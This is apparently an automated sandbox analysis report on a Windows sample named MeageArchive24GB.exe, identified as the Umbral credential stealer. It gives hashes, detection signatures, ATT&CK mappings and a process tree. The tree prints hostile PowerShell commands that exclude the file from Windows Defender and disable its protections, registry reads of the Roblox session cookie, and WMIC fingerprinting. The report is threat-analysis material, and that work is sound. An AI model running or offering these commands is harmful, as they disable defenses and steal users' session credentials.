umbral | b8e51135b2e0a124ac1103a9c4a6f2353d289ffe99611d990c291ae356950ecf

Analysis

max time kernel
21s
max time network
28s
platform
windows10-1703_x64
resource
win10-20240611-en
resource tags

arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system
submitted
29-08-2024 20:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

MeageArchive24GB.exe
Size

229KB
MD5

83b81dda82a62350b52ee97a12d3163a
SHA1

3e7c9d5eda676771071fa77ce8f357b0c32673fa
SHA256

b8e51135b2e0a124ac1103a9c4a6f2353d289ffe99611d990c291ae356950ecf
SHA512

e0d0d47479b19287dbb731b0025c458623fa17e77d506756a7e90289abf0c04faa5e655bd2f521ead68d3c8530cb4ecaf1cb1c48e1fe2e03759affe8c0c4ca04
SSDEEP

6144:lloZM9fsXtioRkts/cnnK6cMlxDKxX8il927De8NhoREb8e1muoi:noZXtlRk83MlxDKxX8il927De8NhoOJ

Score

10^/10

umbral credential_access execution spyware stealer

Malware Config

Signatures

Detect Umbral payload 1 IoCs

resource	yara_rule
behavioral1/memory/784-1-0x000001F9C8720000-0x000001F9C8760000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4992	powershell.exe
4492	powershell.exe
4696	powershell.exe
1332	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	MeageArchive24GB.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
5	ip-api.com

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4856	wmic.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

pid	Process
4992	powershell.exe
4992	powershell.exe
4992	powershell.exe
4492	powershell.exe
4492	powershell.exe
4492	powershell.exe
4696	powershell.exe
4696	powershell.exe
4696	powershell.exe
3864	powershell.exe
3864	powershell.exe
3864	powershell.exe
1332	powershell.exe
1332	powershell.exe
1332	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	784	MeageArchive24GB.exe
Token: SeDebugPrivilege	4992	powershell.exe
Token: SeIncreaseQuotaPrivilege	4992	powershell.exe
Token: SeSecurityPrivilege	4992	powershell.exe
Token: SeTakeOwnershipPrivilege	4992	powershell.exe
Token: SeLoadDriverPrivilege	4992	powershell.exe
Token: SeSystemProfilePrivilege	4992	powershell.exe
Token: SeSystemtimePrivilege	4992	powershell.exe
Token: SeProfSingleProcessPrivilege	4992	powershell.exe
Token: SeIncBasePriorityPrivilege	4992	powershell.exe
Token: SeCreatePagefilePrivilege	4992	powershell.exe
Token: SeBackupPrivilege	4992	powershell.exe
Token: SeRestorePrivilege	4992	powershell.exe
Token: SeShutdownPrivilege	4992	powershell.exe
Token: SeDebugPrivilege	4992	powershell.exe
Token: SeSystemEnvironmentPrivilege	4992	powershell.exe
Token: SeRemoteShutdownPrivilege	4992	powershell.exe
Token: SeUndockPrivilege	4992	powershell.exe
Token: SeManageVolumePrivilege	4992	powershell.exe
Token: 33	4992	powershell.exe
Token: 34	4992	powershell.exe
Token: 35	4992	powershell.exe
Token: 36	4992	powershell.exe
Token: SeDebugPrivilege	4492	powershell.exe
Token: SeDebugPrivilege	4696	powershell.exe
Token: SeDebugPrivilege	3864	powershell.exe
Token: SeIncreaseQuotaPrivilege	2696	wmic.exe
Token: SeSecurityPrivilege	2696	wmic.exe
Token: SeTakeOwnershipPrivilege	2696	wmic.exe
Token: SeLoadDriverPrivilege	2696	wmic.exe
Token: SeSystemProfilePrivilege	2696	wmic.exe
Token: SeSystemtimePrivilege	2696	wmic.exe
Token: SeProfSingleProcessPrivilege	2696	wmic.exe
Token: SeIncBasePriorityPrivilege	2696	wmic.exe
Token: SeCreatePagefilePrivilege	2696	wmic.exe
Token: SeBackupPrivilege	2696	wmic.exe
Token: SeRestorePrivilege	2696	wmic.exe
Token: SeShutdownPrivilege	2696	wmic.exe
Token: SeDebugPrivilege	2696	wmic.exe
Token: SeSystemEnvironmentPrivilege	2696	wmic.exe
Token: SeRemoteShutdownPrivilege	2696	wmic.exe
Token: SeUndockPrivilege	2696	wmic.exe
Token: SeManageVolumePrivilege	2696	wmic.exe
Token: 33	2696	wmic.exe
Token: 34	2696	wmic.exe
Token: 35	2696	wmic.exe
Token: 36	2696	wmic.exe
Token: SeIncreaseQuotaPrivilege	2696	wmic.exe
Token: SeSecurityPrivilege	2696	wmic.exe
Token: SeTakeOwnershipPrivilege	2696	wmic.exe
Token: SeLoadDriverPrivilege	2696	wmic.exe
Token: SeSystemProfilePrivilege	2696	wmic.exe
Token: SeSystemtimePrivilege	2696	wmic.exe
Token: SeProfSingleProcessPrivilege	2696	wmic.exe
Token: SeIncBasePriorityPrivilege	2696	wmic.exe
Token: SeCreatePagefilePrivilege	2696	wmic.exe
Token: SeBackupPrivilege	2696	wmic.exe
Token: SeRestorePrivilege	2696	wmic.exe
Token: SeShutdownPrivilege	2696	wmic.exe
Token: SeDebugPrivilege	2696	wmic.exe
Token: SeSystemEnvironmentPrivilege	2696	wmic.exe
Token: SeRemoteShutdownPrivilege	2696	wmic.exe
Token: SeUndockPrivilege	2696	wmic.exe
Token: SeManageVolumePrivilege	2696	wmic.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 784 wrote to memory of 4992	784	MeageArchive24GB.exe	71
PID 784 wrote to memory of 4992	784	MeageArchive24GB.exe	71
PID 784 wrote to memory of 4492	784	MeageArchive24GB.exe	74
PID 784 wrote to memory of 4492	784	MeageArchive24GB.exe	74
PID 784 wrote to memory of 4696	784	MeageArchive24GB.exe	76
PID 784 wrote to memory of 4696	784	MeageArchive24GB.exe	76
PID 784 wrote to memory of 3864	784	MeageArchive24GB.exe	78
PID 784 wrote to memory of 3864	784	MeageArchive24GB.exe	78
PID 784 wrote to memory of 2696	784	MeageArchive24GB.exe	80
PID 784 wrote to memory of 2696	784	MeageArchive24GB.exe	80
PID 784 wrote to memory of 4004	784	MeageArchive24GB.exe	83
PID 784 wrote to memory of 4004	784	MeageArchive24GB.exe	83
PID 784 wrote to memory of 64	784	MeageArchive24GB.exe	85
PID 784 wrote to memory of 64	784	MeageArchive24GB.exe	85
PID 784 wrote to memory of 1332	784	MeageArchive24GB.exe	87
PID 784 wrote to memory of 1332	784	MeageArchive24GB.exe	87
PID 784 wrote to memory of 4856	784	MeageArchive24GB.exe	89
PID 784 wrote to memory of 4856	784	MeageArchive24GB.exe	89

C:\Users\Admin\AppData\Local\Temp\MeageArchive24GB.exe
"C:\Users\Admin\AppData\Local\Temp\MeageArchive24GB.exe"
1⤵
- Drops file in Drivers directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:784
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\MeageArchive24GB.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4992
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4492
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4696
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3864
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2696
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  PID:4004
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:64
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:1332
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:4856

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ba33fa8f738b3b219a28d246775fdcb3

SHA1
eca0228e67bc2cce75b57ef042905cb8db27849a

SHA256
148ef1304f1f409d5877b9b6b53c89b4e571d21c815e1db49f17eee874eda76f

SHA512
25fe46219d5419699b3d50b66200056fdcebe41f3a0bdfc09b1f9a8d724b2c3ebe352cc34d2eefaa3e63d23475de7942a9dd0f84ded76f60e8a913c6a6ada5ac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3633a9b21c8f4493a881b2a33788dfe8

SHA1
ca6b9bf67e0616ae2584ab044ed970f41321e520

SHA256
bd3e5248256c4851fd108f992182b92ed9ed401d86ab1fb78f14bce7bd450435

SHA512
d1c128e0e47d72e2b1854859cee23f4980384859b07a081480e6ba0e2a766234d3f77cdd545c6d2da9411c1e533f17dde04b9ab6b543967f9f8610546d2a0ed0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8120600485fb26a5181e3b37ea4b22f5

SHA1
19f9f3a0f717f5e06661fd2a5457d528fbfb725a

SHA256
9096557c0e17afc55c957ccfc507ea3cd9b1a99f7bbb4c9555f9c09d7f4fe38f

SHA512
d995b81db28986b9b52baf71ad6be01a4b8a59ec8ab5b0626a25dc45dea7290acf36d83c090e34155b7228e4fa301b75ec3454c1f33aa0880f03cfd779f5c05d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c0b5c97c7b3b305224e8d4f90558da13

SHA1
13b778c4b2cf4c3f546a350b25184cf25d7f9fac

SHA256
8f26a1d71c9dac4acbd1e565ed64d1c394123f26880e223751c06c54082c23d2

SHA512
87c73223c49fbd3ef4bb18b4107a0d433d4e624e3829b03ab2daaca2b47d288b3895ae6f12640409876405e7005cfbbf5c7d91e4f1be6c1a91207b5c7c1fb97f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t3dqwlqm.yg5.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
memory/784-88-0x00007FF844740000-0x00007FF84512C000-memory.dmp

Filesize
9.9MB

Download
memory/784-187-0x00007FF844740000-0x00007FF84512C000-memory.dmp

Filesize
9.9MB

Download
memory/784-1-0x000001F9C8720000-0x000001F9C8760000-memory.dmp

Filesize
256KB

Download
memory/784-155-0x000001F9CA530000-0x000001F9CA542000-memory.dmp

Filesize
72KB

Download
memory/784-154-0x000001F9C8BC0000-0x000001F9C8BCA000-memory.dmp

Filesize
40KB

Download
memory/784-2-0x00007FF844740000-0x00007FF84512C000-memory.dmp

Filesize
9.9MB

Download
memory/784-0-0x00007FF844743000-0x00007FF844744000-memory.dmp

Filesize
4KB

Download
memory/784-89-0x000001F9CA4B0000-0x000001F9CA4CE000-memory.dmp

Filesize
120KB

Download
memory/784-85-0x00007FF844743000-0x00007FF844744000-memory.dmp

Filesize
4KB

Download
memory/784-87-0x000001F9CA4E0000-0x000001F9CA530000-memory.dmp

Filesize
320KB

Download
memory/4992-42-0x00007FF844740000-0x00007FF84512C000-memory.dmp

Filesize
9.9MB

Download
memory/4992-7-0x00007FF844740000-0x00007FF84512C000-memory.dmp

Filesize
9.9MB

Download
memory/4992-8-0x0000021BF0170000-0x0000021BF0192000-memory.dmp

Filesize
136KB

Download
memory/4992-53-0x00007FF844740000-0x00007FF84512C000-memory.dmp

Filesize
9.9MB

Download
memory/4992-52-0x00007FF844740000-0x00007FF84512C000-memory.dmp

Filesize
9.9MB

Download
memory/4992-9-0x00007FF844740000-0x00007FF84512C000-memory.dmp

Filesize
9.9MB

Download
memory/4992-13-0x0000021BF0320000-0x0000021BF0396000-memory.dmp

Filesize
472KB

Download
memory/4992-10-0x00007FF844740000-0x00007FF84512C000-memory.dmp

Filesize
9.9MB

Download